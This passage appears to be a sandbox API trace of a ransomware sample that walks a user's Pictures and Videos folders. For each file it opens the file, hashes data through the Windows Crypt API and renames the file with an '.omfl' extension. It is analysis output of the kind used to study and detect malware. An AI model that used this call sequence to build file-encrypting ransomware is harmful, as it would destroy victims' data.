dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.101] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=53786) returned 1 [0134.101] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.105] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d2cd0) returned 1 [0134.106] CryptCreateHash (in: hProv=0x49d2cd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.106] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.106] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.106] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.106] GetLastError () returned 0x0 [0134.106] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.106] CryptReleaseContext (hProv=0x49d2cd0, dwFlags=0x0) returned 1 [0134.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.106] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.106] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.106] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.106] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.110] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\vNRH6XZeQB5ODCEXcQr0.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\vnrh6xzeqb5odcexcqr0.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\SqYhvBjGVsjCxavcn\\vNRH6XZeQB5ODCEXcQr0.gif.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\sqyhvbjgvsjcxavcn\\vnrh6xzeqb5odcexcqr0.gif.omfl")) returned 1 [0134.111] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.111] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.111] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.112] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74e6bb8 | out: hHeap=0x4970000) returned 1 [0134.112] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf3bb5890, ftCreationTime.dwHighDateTime=0x1d5df65, ftLastAccessTime.dwLowDateTime=0x5d91e210, ftLastAccessTime.dwHighDateTime=0x1d5e043, ftLastWriteTime.dwLowDateTime=0x5d91e210, ftLastWriteTime.dwHighDateTime=0x1d5e043, nFileSizeHigh=0x0, nFileSizeLow=0xd21a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vNRH6XZeQB5ODCEXcQr0.gif", cAlternateFileName="VNRH6X~1.GIF")) returned 0 [0134.112] FindClose (in: hFindFile=0xdce3b70 | out: hFindFile=0xdce3b70) returned 1 [0134.112] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750ca80 | out: hHeap=0x4970000) returned 1 [0134.112] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x49d1c58 | out: hHeap=0x4970000) returned 1 [0134.112] PeekMessageW (in: lpMsg=0xe00ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00ff08) returned 0 [0134.112] PeekMessageW (in: lpMsg=0xe00fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xe00fb74) returned 0 [0134.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\") returned="aQuqK8QzpcTyT\\" [0134.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0134.113] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0134.113] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0134.113] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdce8f58 | out: hHeap=0x4970000) returned 1 [0134.113] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0134.113] PathFindFileNameW (pszPath="") returned="" [0134.113] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\3QTmz8f8xHYfk.flv") returned=".flv" [0134.113] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\3QTmz8f8xHYfk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\3qtmz8f8xhyfk.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.113] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=23694) returned 1 [0134.113] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.117] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.118] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.118] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.118] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.118] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.118] GetLastError () returned 0x0 [0134.118] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.118] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.118] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.118] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.118] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.118] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.118] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.119] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\3QTmz8f8xHYfk.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\3qtmz8f8xhyfk.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\3QTmz8f8xHYfk.flv.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\3qtmz8f8xhyfk.flv.omfl")) returned 1 [0134.120] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.120] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.120] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.121] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.121] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73ff23c0, ftCreationTime.dwHighDateTime=0x1d5dfab, ftLastAccessTime.dwLowDateTime=0xa98681c0, ftLastAccessTime.dwHighDateTime=0x1d5dd7e, ftLastWriteTime.dwLowDateTime=0xa98681c0, ftLastWriteTime.dwHighDateTime=0x1d5dd7e, nFileSizeHigh=0x0, nFileSizeLow=0x15158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="6ci_Wl.mp4", cAlternateFileName="")) returned 1 [0134.121] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\6ci_Wl.mp4") returned=".mp4" [0134.121] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\6ci_Wl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\6ci_wl.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.122] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=86360) returned 1 [0134.122] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.126] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.127] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.127] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.127] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.127] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.127] GetLastError () returned 0x0 [0134.127] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.127] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.127] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.127] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.127] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.127] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.127] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.129] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\6ci_Wl.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\6ci_wl.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\6ci_Wl.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\6ci_wl.mp4.omfl")) returned 1 [0134.129] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.129] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.129] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.131] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.131] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5d458d50, ftCreationTime.dwHighDateTime=0x1d5d820, ftLastAccessTime.dwLowDateTime=0x17e48070, ftLastAccessTime.dwHighDateTime=0x1d5d980, ftLastWriteTime.dwLowDateTime=0x17e48070, ftLastWriteTime.dwHighDateTime=0x1d5d980, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="70hip", cAlternateFileName="")) returned 1 [0134.131] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\COVSnlYtgBe.mp4") returned=".mp4" [0134.131] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\COVSnlYtgBe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\covsnlytgbe.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.131] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=40323) returned 1 [0134.131] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.135] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.136] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.136] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.136] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.136] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.136] GetLastError () returned 0x0 [0134.136] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.136] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.136] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.136] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.136] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.136] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.138] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\COVSnlYtgBe.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\covsnlytgbe.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\COVSnlYtgBe.mp4.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\covsnlytgbe.mp4.omfl")) returned 1 [0134.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.139] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.139] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.140] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.140] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6539bd40, ftCreationTime.dwHighDateTime=0x1d5d84a, ftLastAccessTime.dwLowDateTime=0x2ab80120, ftLastAccessTime.dwHighDateTime=0x1d5e05d, ftLastWriteTime.dwLowDateTime=0x2ab80120, ftLastWriteTime.dwHighDateTime=0x1d5e05d, nFileSizeHigh=0x0, nFileSizeLow=0x18c58, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fVwm-8HzHvWDtAnVydfq.avi", cAlternateFileName="FVWM-8~1.AVI")) returned 1 [0134.140] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\fVwm-8HzHvWDtAnVydfq.avi") returned=".avi" [0134.140] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\fVwm-8HzHvWDtAnVydfq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\fvwm-8hzhvwdtanvydfq.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.140] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=101464) returned 1 [0134.140] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.144] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.145] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.145] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.145] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.145] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.145] GetLastError () returned 0x0 [0134.145] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.145] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.145] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.145] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.145] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.145] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.145] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.147] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\fVwm-8HzHvWDtAnVydfq.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\fvwm-8hzhvwdtanvydfq.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\fVwm-8HzHvWDtAnVydfq.avi.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\fvwm-8hzhvwdtanvydfq.avi.omfl")) returned 1 [0134.148] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.148] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.148] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.149] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.149] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9a05fc30, ftCreationTime.dwHighDateTime=0x1d5e350, ftLastAccessTime.dwLowDateTime=0x68922610, ftLastAccessTime.dwHighDateTime=0x1d5d905, ftLastWriteTime.dwLowDateTime=0x68922610, ftLastWriteTime.dwHighDateTime=0x1d5d905, nFileSizeHigh=0x0, nFileSizeLow=0x9b68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="GaXdRrSNZsjcY.swf", cAlternateFileName="GAXDRR~1.SWF")) returned 1 [0134.149] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\GaXdRrSNZsjcY.swf") returned=".swf" [0134.149] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\GaXdRrSNZsjcY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\gaxdrrsnzsjcy.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.149] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=39784) returned 1 [0134.149] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.153] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.154] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.154] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.154] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.154] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.154] GetLastError () returned 0x0 [0134.154] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.154] CryptReleaseContext (hProv=0x49d1c58, dwFlags=0x0) returned 1 [0134.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0xdd0bd00 | out: hHeap=0x4970000) returned 1 [0134.154] UuidCreate (in: Uuid=0xe00fa48 | out: Uuid=0xe00fa48) returned 0x0 [0134.154] UuidToStringA (in: Uuid=0xe00fa48, StringUuid=0xe00fa40 | out: StringUuid=0xe00fa40) returned 0x0 [0134.154] RpcStringFreeA (in: String=0xe00fa40 | out: String=0xe00fa40) returned 0x0 [0134.154] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.155] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\GaXdRrSNZsjcY.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\gaxdrrsnzsjcy.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\GaXdRrSNZsjcY.swf.omfl" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\gaxdrrsnzsjcy.swf.omfl")) returned 1 [0134.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74fb288 | out: hHeap=0x4970000) returned 1 [0134.156] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x750cb60 | out: hHeap=0x4970000) returned 1 [0134.156] VirtualFree (lpAddress=0x6ec0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0134.157] HeapFree (in: hHeap=0x4970000, dwFlags=0x0, lpMem=0x74bf8f0 | out: hHeap=0x4970000) returned 1 [0134.157] FindNextFileW (in: hFindFile=0xdce3b70, lpFindFileData=0xe00fba4 | out: lpFindFileData=0xe00fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe1cb59c0, ftCreationTime.dwHighDateTime=0x1d5e3af, ftLastAccessTime.dwLowDateTime=0xd04a1c90, ftLastAccessTime.dwHighDateTime=0x1d5d8f6, ftLastWriteTime.dwLowDateTime=0xd04a1c90, ftLastWriteTime.dwHighDateTime=0x1d5d8f6, nFileSizeHigh=0x0, nFileSizeLow=0x759a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hVIjhMbnyRCaiuu0qJ.swf", cAlternateFileName="HVIJHM~1.SWF")) returned 1 [0134.157] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\hVIjhMbnyRCaiuu0qJ.swf") returned=".swf" [0134.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\aQuqK8QzpcTyT\\hVIjhMbnyRCaiuu0qJ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\aquqk8qzpctyt\\hvijhmbnyrcaiuu0qj.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x610 [0134.158] GetFileSizeEx (in: hFile=0x610, lpFileSize=0xe00fb40 | out: lpFileSize=0xe00fb40*=30106) returned 1 [0134.158] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x6ec0000 [0134.161] CryptAcquireContextW (in: phProv=0xe00fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xe00fa50*=0x49d1c58) returned 1 [0134.162] CryptCreateHash (in: hProv=0x49d1c58, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0xe00fa58 | out: phHash=0xe00fa58) returned 1 [0134.162] CryptHashData (hHash=0xdce37f0, pbData=0xdd0bd00, dwDataLen=0x1ef, dwFlags=0x0) returned 1 [0134.162] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x0, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0xe00fa54) returned 1 [0134.162] CryptGetHashParam (in: hHash=0xdce37f0, dwParam=0x2, pbData=0x74cdf28, pdwDataLen=0xe00fa54, dwFlags=0x0 | out: pbData=0x74cdf28, pdwDataLen=0xe00fa54) returned 1 [0134.162] GetLastError () returned 0x0 [0134.162] CryptDestroyHash (hHash=0xdce37f0) returned 1 [0134.162] 